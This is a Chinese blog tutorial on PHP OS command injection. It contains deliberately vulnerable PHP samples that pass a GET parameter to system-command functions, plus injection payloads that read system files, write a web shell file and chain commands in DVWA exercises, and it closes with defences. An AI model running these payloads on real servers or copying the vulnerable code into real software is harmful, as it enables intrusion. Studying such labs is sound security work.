网络安全笔记-OS命令注入漏洞

已于 2023-03-20 16:36:33 修改
阅读量894 收藏
点赞数
分类专栏: 网络安全笔记 文章标签: 网络安全
于 2022-08-15 23:59:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L120305q/article/details/126351250
版权

OS命令注入 PHP 安全漏洞 系统命令 防御策略
关键词由CSDN通过智能技术生成

OS命令注入漏洞

原理以及成因:

程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发应用,特别是企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件)。当应用需要调用一些外部程序时就会用到一些系统命令的函数。应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞。
1、用户输入作为拼接
2、没有足够的过滤

漏洞危害

1、继承Web服务器程序权限(Web用户权限),去执行系统命令
2、继承Web服务器权限,读写文件
3、反弹Shell(服务器主动连接攻击方)获得目标服务器的权限
4、进一步内网渗透,控制整个网站
5、控制整个服务器

相关函数示例

  • system()
    system()能够将字符串作为OS命令执行,自带输出功能。
    测试代码如下:
#system.php
<meta charset='gb2312'>
#1
<?php
$str="ipconfig";
system($str);
?>
#2
<?php
if($_GET['cmd']){
	$str=$_GET['cmd'];
	system($str);
}
?>
#
<?php
if(isset($_GET['cmd'])){
	echo "<pre>";
	system($_GET['cmd']);
}
else{
	echo"?cmd=ipconfig";
}
?>
  • exec()
    exec()能够将字符串作为OS命令执行,需要输出执行结果。
    测试代码如下:
#exec.php
<meta charset="gb2312">
<?php
if(isset($_GET['cmd'])){
	echo "<pre>";
	print exec($str);
}else{
	echo"?cmd=whoami";
}
?>
  • shell_exec()
    测试代码如下:
#shell_exec.php
<?php
if(isset($_GET['cmd'])){
	print shell_exec($_GET['cmd']);
}else{
	echo"?cmd=whoami";  # cmd=systeminfo / net user add
}
?>
  • passthru(). 自带输出
    测试代码如下:
#passthru.php
<?php
if(isset($_GET['cmd'])){
	passthru($_GET['cmd']);
}else{
	echo"?cmd=whoami";  # cmd=systeminfo / net user add
}
?>
  • popen().执行OS命令,并非返回命令结果,而是返回一个文件指针。
    测试代码如下:
#popen.php
<?php
if(isset($_GET['cmd'])){
	$cmd=$_GET['cmd'].">>1.txt";
	popen($cmd,'r');
}else{
	echo"?cmd=whoami";  # cmd=systeminfo / net user add
}
?>

查看1.txt文件

  • 反引号`(Mac英文输入下,option+1左边的键盘)
    反引号``内的字符串,也会被解析成OS命令。
    测试代码如下:
#`.php
<?php
if(isset($_GET['cmd'])){
	$cmd=$_GET['cmd'];
	print `$cmd`;
}else{
	echo"?cmd=whoami";  # cmd=systeminfo / net user add
}
?>

漏洞利用

OS命令注入漏洞,攻击者直接继承Web用户权限,在服务器上执行任意命令,危害特别大。以下命令均在windows系统下测试成功。

  • 查看系统文件
    提交参数
    [?cmd=type c:\windows\system32\drivers\etc\hosts]
    查看系统hosts文件。
  • 显示当前路径
    提交参数[?cmd=cd]
  • 写文件
    提交参数
    [?cmd=echo"?php phpinfo();?>" > D:\xampp\htdocs\Commandi\shell.php]
    页面没有报错,说明文件写入成功。访问shell.php文件。

防御方法

  1. 尽量减少命令执行函数的使用,并在disable_functions中禁用
  2. 在进入命令执行的函数或方法之前,对参数进行过滤
  3. 参数的值尽量使用引号包裹,并在拼接前调用addslashes进行转义

练习

安全是需要全方面考虑的问题

DVWA 命令注入(代码审计)

low
127.0.0.1| whoami
127.0.0.1|whoami
127.0.0.1&&whoami
127.0.0.1;whoami
127.0.0.0.1||whoami
medium
127.0.0.1| whoami
127.0.0.1|whoami
127.0.0.0.1||whoami
high
127.0.0.1|whoami

参考链接

OS命令注入

二手卡西欧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
命令注入漏洞
qq_44915227的博客
04-23 1354
命令注入攻击(即Command Injection)是web应用程序对用户的输入提交的数据过滤不严格,导致攻击者构造恶意的特殊命令字符串的方式将数据提交到web应用程序中,从而执行外部程序或系统命令来进行攻击,非法获取目标服务器的数据资源。继承Web服务器程序(web用户)权限,去执行系统命令继承Web服务器权限,读写文件反弹Shell控制整个网站控制整个服务器测试IP地址:8.8.8.8(返回ping的结果)自己本机地址也是一样的。
Web安全——命令注入漏洞详解
热门推荐
Boom!脑洞大爆炸的博客
06-09 1万+
手把手入门命令注入漏洞
命令注入漏洞(详解)
qq_70584783的博客
06-03 415
命令注入漏洞(Command Injection Vulnerability)是一种严重的安全漏洞,存在于许多web应用程序和软件中。这种漏洞允许攻击者通过在输入字段中插入恶意命令,来执行服务器端的任意命令。这可能包括读取、修改或删除服务器上的文件,执行系统命令以控制服务器,访问敏感数据,安装恶意软件,或者利用服务器作为跳板进一步攻击内网资源等。
什么是命令注入漏洞
Ping_Pig的博客
08-11 4782
漏洞原因: web应用程序有时需要调用一些系统命令的函数,如PHP中的system,exec,shell-exec等等,当用户能够控制这些函数中的参数时,就可以将恶意参系统命令拼接到正常命令中,从而造成命令注入攻击 漏洞形成需要同时满足以下三个条件: 使用了内部调用shell的函数(system,exec) 将外界传入的参数传递给内部调用shell的函数 参数中shell的元字符没有被转...
CTF-命令注入
不知名白帽的博客
05-28 1061
CTF-命令注入,实验环境:(192.168.20.128),靶机(192.168.20.141)。通过信息探测,深入挖掘隐藏信息,获取账号和密码,用searchsploit搜寻漏洞,再用msfconsole进行监听,然后用base64绕过防火墙,生成sehll,上传shell,反弹shell...
浅谈“命令注入
→_→
05-13 1505
漏洞名称: 命令注入 描述: Command Injection,即命令注入攻击,是指由于Web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至Web应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。 在命令注入漏洞中,最为常见的是PHP的命令注入。PHP命令注入攻击存在的主要原因是Web应用程序员在应用PHP语言中一些具有命令执行功能的函数时,对用户提交的数据内容没有进行严格的过滤就带入函数中执行而造成的。例如,
网络安全on-model-for开发笔记
06-08
"网络安全on-model-for开发笔记"可能是指一种基于模型的网络安全解决方案,它涉及到深度学习技术,特别是卷积神经网络(CNN)、双向长短期记忆网络(Bi-LSTM)以及注意力机制(Attention Model)在网络安全入侵检测...
网络安全r-paper-mas笔记
06-06
"网络安全r_paper-mas笔记"可能是一份详细记录了关于网络安全研究论文的笔记,特别是针对“Master”级别的深入理解和应用。这份笔记可能涵盖了多个关键主题,包括但不限于密码学、网络攻击与防御、隐私保护、恶意...
HCIP-Security 网络安全 上课笔记
06-26
HCIP-Security 网络安全 上课笔记 本文档主要讲解HCIP-Security网络安全上课笔记,涵盖了Eth-trunk的配置、LACP模式、链路健康检查等网络安全知识点。 1. Eth-trunk配置 Eth-trunk是将多个物理接口捆绑成一个逻辑...
网络安全earning-homework-m笔记
07-07
网络安全
网络安全arning-homewo笔记
最新发布
07-08
网络安全
命令注入漏洞(1)
weixin_45007073的博客
01-14 1309
命令注入漏洞原理 其实命令注入漏洞也叫命令注入漏洞,此漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入的参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 靶机搭建 链接:https://pan.baidu.com/s/1W8kgkYPrHchakwy9kU6g7A 提取码:9mm5 漏洞复现 使用netdiscover发现存活主机 netdiscover -i eth0 使用nmap对目标进行服务探测 nmap -sV 192.168.101.46 发现它只开放了8
渗透测试-命令执行注入
lza20001103的博客
07-20 2918
渗透测试-命令执行注入
(八)OS命令注入
weixin_43047908的博客
04-13 1458
什么是OS命令注入? 操作系统命令注入(也称为外壳程序注入)是一个Web安全漏洞,它使攻击者可以在运行应用程序的服务器上执行任意操作系统(OS)命令,并且通常会完全破坏该应用程序及其所有数据。通常,攻击者可以利用OS命令注入漏洞来破坏托管基础结构的其他部分,利用信任关系将攻击转移到组织内的其他系统。 执行任意命令 考虑一个购物应用程序,该应用程序使用户可以查看特定商店中某商品是否有库存。可通过以下网址访问此信息: https://insecure-website.com/stockStatus?produc
【web-渗透测试方法】(15.6)测试基于输入的漏洞
09-04 1044
【测试基于输入的漏洞
导致命令注入漏洞的php函数,PHP命令注入***
weixin_42514910的博客
03-21 932
PHP命令注入***漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。本文描述了常见的PHP命令注入***漏洞存在形式和利用方法,结合漏洞实例进行分析和漏洞利用,并针对如何防范PHP命令注入***漏洞给出了可行的方法和建议。Command Injection,即命令注入***,是指由于Web应用程序对用户提交的数据过滤不严格,...
注入攻击
weixin_51051051的博客
10-14 3310
注入攻击 OWASP将注入攻击和跨站脚本攻击(XSS)列入网络应用程序十大常见安全风险。实际上,它们会一起出现,因为 XSS 攻击依赖于注入攻击的成功。虽然这是最明显的组合关系,但是注入攻击带来的不仅仅是 XSS。 注入攻击代指一类攻击,它们通过注入数据到一个网络应用程序以期获得执行,亦或是通过非预期的一个方式来执行恶意数据。这种类别的攻击包括跨站脚本攻击(XSS)、SQL 注入攻击、头部注入攻击、日志注入攻击和全路径暴露。当然限于篇幅,这里只是一个简单的介绍。 这类攻击是每个程序员的梦魇。它们数量庞大、攻
HCIA-Security网络安全学习笔记:OSI模型、TCP/IP协议详解
HCIA-Security 网络安全学习笔记笔记涵盖了HCIA-Security 认证考试的重要知识点,包括网络安全、USG 模拟器使用、OSI 模型、TCP/IP 模型、各层协议之间的关系等。 **USG 模拟器使用** USG 模拟器是网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值